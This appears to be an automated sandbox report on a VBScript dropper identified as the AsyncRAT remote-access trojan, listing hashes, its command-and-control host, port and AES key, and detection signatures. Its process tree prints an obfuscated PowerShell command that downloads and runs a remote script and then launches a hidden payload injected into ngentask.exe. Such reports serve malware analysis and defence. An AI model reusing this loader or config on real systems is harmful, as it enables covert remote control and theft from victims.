Overview

overview

10

Static

static

LKGFCV.vbs.vbs

windows7_x64

8

LKGFCV.vbs.vbs

windows10_x64

10

Analysis

  • max time kernel
    128s
  • max time network
    159s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    27-07-2021 15:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LKGFCV.vbs.vbs

  • Size

    730B

  • MD5

    8a7246cc77596aa840c15b3ac9907c4e

  • SHA1

    c34f30b5aa3777cf3b3d35cfd8af330f8af97981

  • SHA256

    c7be7d6e94c31e0f376d1cb9be3e0f311d57ae1a318437dc7c28b2574a73be31

  • SHA512

    790e62a08b098dcdda4dfc1cc218712f069426b639420aca7ae6dfbd239f765fe379b92847d12da8a8f68699068d1779e7415d1c76fa64a989ae9dfa8b7dbe94

Score
10/10
asyncratratsuricata

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

newfrost.ddns.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    iQqiAD9kmzPLel2oEjZjj8tYKfnH5XkL

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    new

  • host

    newfrost.ddns.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6666

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
    suricata
  • Async RAT payload 3 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LKGFCV.vbs.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3BMLFhm'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:412
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
          4⤵
            PID:1852
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
            4⤵
              PID:1396
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2084

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Public\ToT.ps1
        MD5

        1553ebbcd9e6ba4ac17862506e0869cd

        SHA1

        2202ca18a46e81c3d4f8e021b69c77b8368eb580

        SHA256

        ed0135626c359fa8bab49ea7481e20b5062d1f613c65b039cf42ae27ead0437d

        SHA512

        5913d4b247970046febf38e18c614528bb6f9552cef4a2b1b34ef70a6831c84c9a0409217b221b3bf4adc0e0eb7083914bbd9e9d65d0b59b0104604b1fdaa238

        Download Submit
      • memory/412-369-0x0000024023EB6000-0x0000024023EB8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/412-310-0x0000000000000000-mapping.dmp
        Download
      • memory/412-334-0x000002403E4D0000-0x000002403E4D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/412-348-0x0000024023EB3000-0x0000024023EB5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/412-347-0x0000024023EB0000-0x0000024023EB2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/412-353-0x000002403E490000-0x000002403E49E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/1696-120-0x0000024E29CA3000-0x0000024E29CA5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1696-121-0x0000024E41E90000-0x0000024E41E91000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1696-126-0x0000024E42250000-0x0000024E42251000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1696-309-0x0000024E29CA6000-0x0000024E29CA8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1696-119-0x0000024E29CA0000-0x0000024E29CA2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1696-114-0x0000000000000000-mapping.dmp
        Download
      • memory/2084-381-0x0000000007100000-0x0000000007101000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-375-0x0000000006900000-0x0000000006979000-memory.dmp
        Filesize

        484KB

        Download
      • memory/2084-374-0x0000000006980000-0x0000000006981000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-371-0x0000000005A20000-0x0000000005A21000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-372-0x0000000005FC0000-0x0000000005FC1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-373-0x0000000005B30000-0x0000000005B31000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-370-0x0000000005140000-0x0000000005141000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-383-0x0000000006FA0000-0x0000000006FA1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-376-0x0000000006A50000-0x0000000006A51000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-377-0x0000000006B50000-0x0000000006B51000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2084-378-0x0000000006AC0000-0x0000000006AC4000-memory.dmp
        Filesize

        16KB

        Download
      • memory/2084-379-0x0000000006F10000-0x0000000006F9D000-memory.dmp
        Filesize

        564KB

        Download
      • memory/2084-380-0x00000000070A0000-0x00000000070F9000-memory.dmp
        Filesize

        356KB

        Download
      • memory/2084-358-0x0000000000400000-0x0000000000412000-memory.dmp
        Filesize

        72KB

        Download
      • memory/2084-382-0x0000000000D00000-0x0000000000D20000-memory.dmp
        Filesize

        128KB

        Download
      • memory/2084-359-0x000000000040C73E-mapping.dmp
        Download